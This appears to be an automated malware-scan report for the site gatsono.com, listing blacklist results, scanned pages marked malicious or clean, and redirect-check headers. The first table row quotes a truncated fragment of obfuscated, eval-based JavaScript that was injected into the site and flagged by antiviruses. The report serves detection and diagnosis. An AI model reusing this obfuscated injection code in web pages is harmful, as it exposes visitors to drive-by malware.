Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gatsono.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gatsono.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gatsono.com/ | 200 OK Content-Length: 14252 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document.body^=~1;}catch(q){a2="!"}z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!6f!69!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!6f!69!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!79!7a!6d!74!7d!70!7e!79!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!6f!69!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42! Antivirus reports:
http://gatsono.com/cp/scripts/index.html | 200 OK Content-Length: 7833 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://gatsono.com/cp/scripts/ASP/index.html | 200 OK Content-Length: 2376 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://gatsono.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/Perl/index.html | 200 OK Content-Length: 2376 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://gatsono.com/cp/scripts/PHP/index.html | 200 OK Content-Length: 7644 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://gatsono.com/cp/scripts/PHP/chat.html | 200 OK Content-Length: 4522 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://gatsono.com/cp/scripts/PHP/./chat/phpchat.php | 200 OK Content-Length: 1375 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/PHP/./chat/phpchat.php?mode=showall | 200 OK Content-Length: 293 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/PHP/./chat/phpchat.php?mode=admin | 200 OK Content-Length: 351 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/PHP/./Chat/readme.txt | 200 OK Content-Length: 2245 Content-Type: text/plain | clean |
http://gatsono.com/cp/scripts/PHP/countsetup.html | 200 OK Content-Length: 4535 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://gatsono.com/cp/scripts/PHP/./counter/counter.php | 200 OK Content-Length: 724 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/PHP/./counter/function.fopen | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/PHP/./Counter/readme.txt | 200 OK Content-Length: 2955 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gatsono.com
Result:
HTTP/1.1 200 OK
Date: Sat, 11 Oct 2014 23:28:36 GMT
Accept-Ranges: bytes
ETag: "80d344f48a3bce1:0"
Content-Length: 14252
Content-Type: text/html
Last-Modified: Wed, 17 Apr 2013 16:45:23 GMT
X-Powered-By: ASP.NET
...14252 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gatsono.com
Referer: http://www.google.com/search?q=gatsono.com
Result:
The result is similar to the first query. There are no suspicious redirects found.